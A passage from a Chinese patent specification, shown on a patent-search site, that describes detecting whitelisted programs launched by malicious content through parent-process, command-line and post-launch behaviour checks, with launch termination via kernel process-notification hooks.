[0143] 如圖4所示,區(qū)別于實(shí)施例三基于命令行中可能包含的網(wǎng)絡(luò)特征的判斷方式,本實(shí)施例基于命令行中可能包含的文件路徑并通過文件路徑追溯到對應(yīng)的文件來進(jìn)行判斷,類似于對父進(jìn)程文件是否為惡意文件的判斷(兩者在判斷文件是否為惡意文件的方面可采用相同的首先方式),但區(qū)別在于該文件是如何找到的。
[0144] 實(shí)施例二、實(shí)施例三以及實(shí)施例四均為針對啟動信息的不同具體表現(xiàn),所分別給出的具體實(shí)現(xiàn)方式,其中,實(shí)施例二是通過追溯父進(jìn)程對應(yīng)的父進(jìn)程文件是否為惡意文件,實(shí)施例三和實(shí)施例四則分別從命令行的網(wǎng)絡(luò)特征和文件路徑展開,分別通過判斷網(wǎng)絡(luò)特征是否具有威脅、文件路徑指向的文件是否為惡意文件實(shí)現(xiàn)判斷目的。應(yīng)當(dāng)理解的是,上述三個實(shí)施例均屬并列關(guān)系,完全可以同時出現(xiàn)在一個具體的實(shí)施例中(即同時存在三個判斷),也可以按照上述各實(shí)施例的闡述單獨(dú)存在,此處并不做具體限定,上述實(shí)施例僅用于描述其中的一種可能性。
[0145] 上述各實(shí)施例的方案視圖解決現(xiàn)有技術(shù)缺陷的度均為:判斷合理的啟動前判斷,得出該白名單程序是否正常啟動的結(jié)論,從而終止(攔截)啟動操作還是放行,即希望以不啟動受惡意內(nèi)容控制的白名單程序的方式來解決問題。但需要說明的是,惡意內(nèi)容的更新、變種速度極快,上述的前置檢測步驟有存在誤判的可能,即前置檢測認(rèn)為可以放行的也不一定就是正常內(nèi)容控制啟動。因此,為了加強(qiáng)檢測效果,本實(shí)施例還在實(shí)施例一給出的前置檢測的方案的基礎(chǔ)上增加了后置檢測方案,即通過上述給出的任意實(shí)施例均無法在前置檢測過程檢測出該白名單程序由惡意內(nèi)容控制啟動的基礎(chǔ)上,為了盡可能的保障運(yùn)行環(huán)境的安全性,還可以通過下述方式實(shí)現(xiàn)后置檢測:
[0146] 監(jiān)測得到白名單程序啟動后的實(shí)際行為特征;
[0147] 比較實(shí)際行為特征和預(yù)設(shè)行為特征的方式,以根據(jù)比較結(jié)果確定白名單程序是否由惡意內(nèi)容控制啟動。
[0148] 換句話說,本實(shí)施例提供的后置檢測方式是通過對啟動后的白名單程序所執(zhí)行的操作進(jìn)行監(jiān)控和判別的方式來從行為層面判斷其是否執(zhí)行了惡意行為,從而倒推出其是否受到惡意內(nèi)容的控制。
[0149] 其中,該預(yù)設(shè)行為特征包括標(biāo)準(zhǔn)行為特征和惡意行為特征,該標(biāo)準(zhǔn)行為特征是從該白名單程序正常啟動后執(zhí)行的行為中提取到的行為特征,該惡意行為特征則是明確該白名單程序受惡意內(nèi)容控制啟動后執(zhí)行的行為中提取到的行為特征。相應(yīng)的,本步驟可具體表現(xiàn)為以下兩種,請分別參見圖5所示的根據(jù)與標(biāo)準(zhǔn)行為特征進(jìn)行比較和圖6所示的與已知的惡意行為特征進(jìn)行比較的流程圖。其中,圖5所示流程圖包括如下步驟:
[0150] S501:獲取啟動的白名單程序的啟動信息;
[0151] S502:根據(jù)啟動信息判斷白名單程序是否由惡意內(nèi)容控制啟動,若是,執(zhí)行S506,否則執(zhí)行S503;
[0152] S503:監(jiān)測得到白名單程序啟動后的實(shí)際行為特征;
[0153] 本步驟建立在S502的判斷結(jié)果為根據(jù)啟動信息判斷白名單程序不是由惡意內(nèi)容控制啟動的基礎(chǔ)上,說明前置檢測步驟未檢出本次啟動是由正常內(nèi)容控制實(shí)現(xiàn)的。本步驟將繼續(xù)監(jiān)測白名單程序啟動后所執(zhí)行的行為,得到實(shí)際行為特征。
[0154] S504:判斷實(shí)際行為特征是否與標(biāo)準(zhǔn)行為特征一致,若是,執(zhí)行S505,否則執(zhí)行S506;
[0155] 為實(shí)現(xiàn)本實(shí)施例所提供的后置檢測方案,需要預(yù)先為每個白名單程序建立標(biāo)準(zhǔn)行為特征庫。該標(biāo)準(zhǔn)行為特征庫中的標(biāo)準(zhǔn)行為特征可通過對收集得到標(biāo)準(zhǔn)行為進(jìn)行量化和歸一化等預(yù)處理操作后,使用算法對特征集進(jìn)行訓(xùn)練得到模型進(jìn)行處理的方式匯總得到。具體的,這里可以在前期選擇Logistic?Regression(邏輯回歸)、SVM支持向量機(jī)、決策樹等分類算法進(jìn)行嘗試性訓(xùn)練,并最終選擇其中效果較優(yōu)的算法作為最終實(shí)際使用的算法。
[0156] 在S503的基礎(chǔ)上,本步驟旨在通過實(shí)際行為特征與標(biāo)準(zhǔn)行為特征之間是否具有一致性,從而判斷出白名單程序是否存在異常行為,當(dāng)一個系統(tǒng)底層程序執(zhí)行了不應(yīng)執(zhí)行的行為時,有理由判斷是受到惡意內(nèi)容的控制。
[0157] S505:不做處理;
[0158] 本步驟建立在S504的判斷結(jié)果為實(shí)際行為特征與標(biāo)準(zhǔn)行為特征一致的基礎(chǔ)上,說明白名單程序并未執(zhí)行異常操作,因此可以認(rèn)為該白名單程序的本次啟動不僅通過了前置檢測,還通過了后置檢測,將以不做處理的方式繼續(xù)其后續(xù)操作。
[0159] S506:終止白名單程序的啟動操作。
[0160] 本步驟建立在S502的判斷結(jié)果為根據(jù)啟動信息判斷白名單程序是由惡意內(nèi)容控制啟動,或S504的判斷結(jié)果為實(shí)際行為特征與標(biāo)準(zhǔn)行為特征不一致的基礎(chǔ)上,說明該白名單程序并未同時通過前置檢測和后置檢測,因此將立即終止白名單程序的啟動操作,減少損失。
[0161] 本實(shí)施例在上述各僅通過前置檢測的實(shí)施例的基礎(chǔ)上,增加了后置檢測步驟,使得判斷遍及白名單程序的全運(yùn)行周期,結(jié)論更加準(zhǔn)確,有效彌補(bǔ)了前置檢測因判據(jù)更新不及時造成的錯誤判斷所造成的損失。其中,本實(shí)施例中的S502步驟完全可以替換為實(shí)施例二、實(shí)施例三、實(shí)施例四中的任意一種以及其任意組合,此處不再一一贅述。
[0162] 區(qū)別于圖5,圖6所示流程圖包括如下步驟:
[0163] S601:獲取啟動的白名單程序的啟動信息;
[0164] S602:根據(jù)啟動信息判斷白名單程序是否由惡意內(nèi)容控制啟動,若是,執(zhí)行S506,否則執(zhí)行S503;
[0165] S603:監(jiān)測得到白名單程序啟動后的實(shí)際行為特征;
[0166] S604:判斷實(shí)際行為特征是否為已知的惡意行為特征,若是,執(zhí)行S606,否則執(zhí)行S605;
[0167] S605:不做處理;
[0168] S606:終止白名單程序的啟動操作。
[0169] 區(qū)別于如圖5所示的基于是否與標(biāo)準(zhǔn)行為特征一致的判別方式,本實(shí)施例則通過是否與已知的惡意行為特征一致更直接的判別出實(shí)際行為特征是否為惡意行為特征。其余部分與圖5所示實(shí)施例一致,此處不再一一贅述。
[0170] 針對上述各實(shí)施例中終止該白名單程序的啟動操作的步驟,其需要的進(jìn)程攔截或進(jìn)程監(jiān)控功能可具體通過HOOK(鉤子)技術(shù)實(shí)現(xiàn),相關(guān)的API(Application?Programming?Interface,應(yīng)用程序接口)可以包括:PsSetCreateProcessNotifyRoutineEx(x32)、PsSetCreateThreadNotifyRoutine(x64)、PsSetLoadImageNotifyRoutine、PsRemoveLoadImageNotifyRoutine、PsSetCreateProcessNotifyRoutineEx。當(dāng)然,進(jìn)程攔截或進(jìn)程監(jiān)控還可以通過其它方式實(shí)現(xiàn),此處并不做具體限定,只要能夠?qū)崿F(xiàn)這一目的即可。
[0171] 為加深理解,本申請還結(jié)合實(shí)際情況,通過圖7給出了一種優(yōu)選的實(shí)現(xiàn)方式。圖如7所示的流程中不僅同時包含了上述三種并列的前置檢測機(jī)制,還增加了后置檢測方案,以期實(shí)現(xiàn)最優(yōu)的檢測效果。
[0172] 因?yàn)榍闆r復(fù)雜,無法一一列舉進(jìn)行闡述,本領(lǐng)域技術(shù)人員應(yīng)能意識到根據(jù)本申請?zhí)峁┑幕痉椒ㄔ斫Y(jié)合實(shí)際情況可以存在很多的例子,在不付出足夠的創(chuàng)造性勞動下,應(yīng)均在本申請的保護(hù)范圍內(nèi)。
[0173] 下面請參見圖8,圖8為本申請實(shí)施例所提供的一種惡意內(nèi)容檢測裝置的結(jié)構(gòu)框圖,該裝置可以包括:
[0174] 啟動信息獲取單元100,用于獲取啟動的白名單程序的啟動信息;
[0175] 惡意啟動判斷單元200,用于根據(jù)啟動信息判斷白名單程序是否由惡意內(nèi)容控制啟動;
[0176] 終止啟動單元300,用于當(dāng)根據(jù)啟動信息判斷白名單程序由惡意內(nèi)容控制啟動時,終止白名單程序的啟動操作。
[0177] 其中,該啟動信息獲取單元100可以包括:
[0178] 父進(jìn)程獲取子單元,用于獲取啟動的白名單程序的所有父進(jìn)程;
[0179] 對應(yīng)的,該惡意啟動判斷單元200可以包括:
[0180] 父進(jìn)程文件判斷子單元,用于判斷父進(jìn)程對應(yīng)的父進(jìn)程文件是否為惡意文件;
[0181] 第一惡意啟動判定子單元,用于當(dāng)父進(jìn)程文件為惡意文件時,判定白名單程序由惡意內(nèi)容控制啟動;
[0182] 第二非惡意啟動判定子單元,用于當(dāng)父進(jìn)程文件不是惡意文件時,判定白名單程序由正常內(nèi)容控制啟動。
[0183] 進(jìn)一步的,該惡意內(nèi)容檢測裝置還可以包括:
[0184] 其它白名單程序存在判斷單元,用于當(dāng)父進(jìn)程文件為惡意文件時,判斷父進(jìn)程文件是否還能夠控制其它白名單程序啟動;
[0185] 標(biāo)記附加單元,用于當(dāng)父進(jìn)程文件還能夠控制其它白名單程序啟動時,為其它白名單程序附加不允許啟動的標(biāo)記,以使啟動其它白名單程序時直接根據(jù)標(biāo)記終止啟動操作。
[0186] 其中,該啟動信息獲取單元100可以包括:
[0187] 第一命令行獲取子單元,用于獲取啟動的白名單程序的命令行;
[0188] 對應(yīng)的,該惡意啟動判斷單元200可以包括:
[0189] 網(wǎng)絡(luò)特征包含判斷子單元,用于判斷命令行中是否包含有網(wǎng)絡(luò)特征;
[0190] 網(wǎng)絡(luò)特征威脅判斷子單元,用于當(dāng)命令行中包含有網(wǎng)絡(luò)特征時,判斷網(wǎng)絡(luò)特征是否具有威脅;
[0191] 第二惡意啟動判定子單元,用于當(dāng)網(wǎng)絡(luò)特征具有威脅時,判定白名單程序由惡意內(nèi)容控制啟動;
[0192] 第二非惡意啟動判定子單元,用于當(dāng)命令行中不包含有網(wǎng)絡(luò)特征或網(wǎng)絡(luò)特征不具有威脅時,判定白名單程序由正常內(nèi)容控制啟動。
[0193] 其中,該啟動信息獲取單元100可以包括:
[0194] 第二命令行獲取子單元,用于獲取啟動的白名單程序的命令行;
[0195] 對應(yīng)的,該惡意啟動判斷單元200可以包括:
[0196] 文件路徑包含判斷子單元,用于判斷命令行中是否包含有文件路徑;
[0197] 路徑指向文件性質(zhì)判斷子單元,用于當(dāng)命令行中包含有文件路徑時,判斷文件路徑指向的文件是否為惡意文件;
[0198] 第三惡意啟動判定子單元,用于當(dāng)文件路徑指向的文件為惡意文件時,判定白名單程序由惡意內(nèi)容控制啟動;
[0199] 第三非惡意啟動判定子單元,用于當(dāng)命令行中不包含有文件路徑或文件路徑指向的文件不是惡意文件時,判定白名單程序由正常內(nèi)容控制啟動。
[0200] 進(jìn)一步的,該惡意內(nèi)容檢測裝置還可以包括:
[0201] 實(shí)際行為特征獲取單元,用于當(dāng)根據(jù)啟動信息無法判斷出白名單程序由惡意內(nèi)容控制啟動時,監(jiān)測得到白名單程序啟動后的實(shí)際行為特征;
[0202] 行為特征比對單元,用于比較所述實(shí)際行為特征和預(yù)設(shè)行為特征,以根據(jù)比較結(jié)果確定所述白名單是否由惡意內(nèi)容控制啟動。
[0203] 更進(jìn)一步的,該惡意內(nèi)容檢測方法還可以包括:
[0204] 惡意內(nèi)容入侵提示單元,用于在終止白名單程序的啟動操作之后,通過預(yù)設(shè)路徑上報包含被終止啟動操作的白名單程序的惡意內(nèi)容入侵提示。
[0205] 本實(shí)施例作為對應(yīng)與上述各方法實(shí)施例的裝置實(shí)施例存在,具有方法實(shí)施例的全部有益效果,此處不再一一贅述。
[0206] 基于上述實(shí)施例,本申請還提供了一種電子設(shè)備,該電子設(shè)備可以包括存儲器和處理器,其中,該存儲器中存有計算機(jī)程序,該處理器調(diào)用該存儲器中的計算機(jī)程序時,可以實(shí)現(xiàn)上述實(shí)施例所提供的任意惡意內(nèi)容檢測方法的步驟。當(dāng)然,該電子設(shè)備還可以包括各種必要的網(wǎng)絡(luò)接口、電源以及其它零部件等。
[0207] 本申請還提供了一種可讀存儲介質(zhì),其上存有計算機(jī)程序,該計算機(jī)程序被執(zhí)行終端或處理器執(zhí)行時可以實(shí)現(xiàn)上述實(shí)施例所提供的步驟。該存儲介質(zhì)可以包括:U盤、移動硬盤只讀存儲器(Read-Only?Memory,ROM)、隨機(jī)存取存儲器(Random?Access?Memory,RAM)、磁碟或者光盤等各種可以存儲程序代碼的介質(zhì)。
[0208] 說明書中各個實(shí)施例采用遞進(jìn)的方式描述,每個實(shí)施例重點(diǎn)說明的都是與其他實(shí)施例的不同之處,各個實(shí)施例之間相同相似部分互相參見即可。對于實(shí)施例公開的裝置而言,由于其與實(shí)施例公開的方法相對應(yīng),所以描述的比較簡單,相關(guān)之處參見方法部分說明即可。
[0209] 專業(yè)人員還可以進(jìn)一步意識到,結(jié)合本文中所公開的實(shí)施例描述的各示例的單元及算法步驟,能夠以電子硬件、計算機(jī)軟件或者二者的結(jié)合來實(shí)現(xiàn),為了清楚地說明硬件和軟件的可互換性,在上述說明中已經(jīng)按照功能一般性地描述了各示例的組成及步驟。這些功能究竟以硬件還是軟件方式來執(zhí)行,取決于技術(shù)方案的特定應(yīng)用和設(shè)計約束條件。專業(yè)技術(shù)人員可以對每個特定的應(yīng)用來使用不同方法來實(shí)現(xiàn)所描述的功能,但是這種實(shí)現(xiàn)不應(yīng)認(rèn)為超出本申請的范圍。
[0210] 本文中應(yīng)用了具體個例對本申請的原理及實(shí)施方式進(jìn)行了闡述,以上實(shí)施例的說明只是用于幫助理解本申請的方法及其核心思想。對于本技術(shù)領(lǐng)域的普通技術(shù)人員來說,在不脫離本申請原理的前提下,還可以對本申請進(jìn)行若干改進(jìn)和修飾,這些改進(jìn)和修飾也落入本申請權(quán)利要求的保護(hù)范圍內(nèi)。
[0211] 還需要說明的是,在本說明書中,諸如第一和第二等之類的關(guān)系術(shù)語僅僅用來將一個實(shí)體或者操作與另一個實(shí)體或操作區(qū)分開來,而不一定要求或者暗示這些實(shí)體或操作之間存在任何這種實(shí)際的關(guān)系或者順序。而且,術(shù)語“包括”、“包含”或者其任何其它變體意在涵蓋非排他性的包含,從而使得包括一系列要素的過程、方法、物品或者設(shè)備不僅包括那些要素,而且還包括沒有明確列出的其它要素,或者是還包括為這種過程、方法、物品或者設(shè)備所固有的要素。在沒有更多限制的情況下,由語句“包括一個……”限定的要素,并不排除在包括要素的過程、方法、物品或者設(shè)備中還存在另外的相同要素。
高效檢索全球?qū)@?/div>

專利匯是專利免費(fèi)檢索,專利查詢,專利分析-國家發(fā)明專利查詢檢索分析平臺,是提供專利分析,專利查詢,專利檢索等數(shù)據(jù)服務(wù)功能的知識產(chǎn)權(quán)數(shù)據(jù)服務(wù)商。

我們的產(chǎn)品包含105個國家的1.26億組數(shù)據(jù),免費(fèi)查、免費(fèi)專利分析。

申請試用

分析報告

專利匯分析報告產(chǎn)品可以對行業(yè)情報數(shù)據(jù)進(jìn)行梳理分析,涉及維度包括行業(yè)專利基本狀況分析、地域分析、技術(shù)分析、發(fā)明人分析、申請人分析、專利權(quán)人分析、失效分析、核心專利分析、法律分析、研發(fā)重點(diǎn)分析、企業(yè)專利處境分析、技術(shù)處境分析、專利壽命分析、企業(yè)定位分析、引證分析等超過60個分析角度,系統(tǒng)通過AI智能系統(tǒng)對圖表進(jìn)行解讀,只需1分鐘,一鍵生成行業(yè)專利分析報告。

申請試用

QQ群二維碼
意見反饋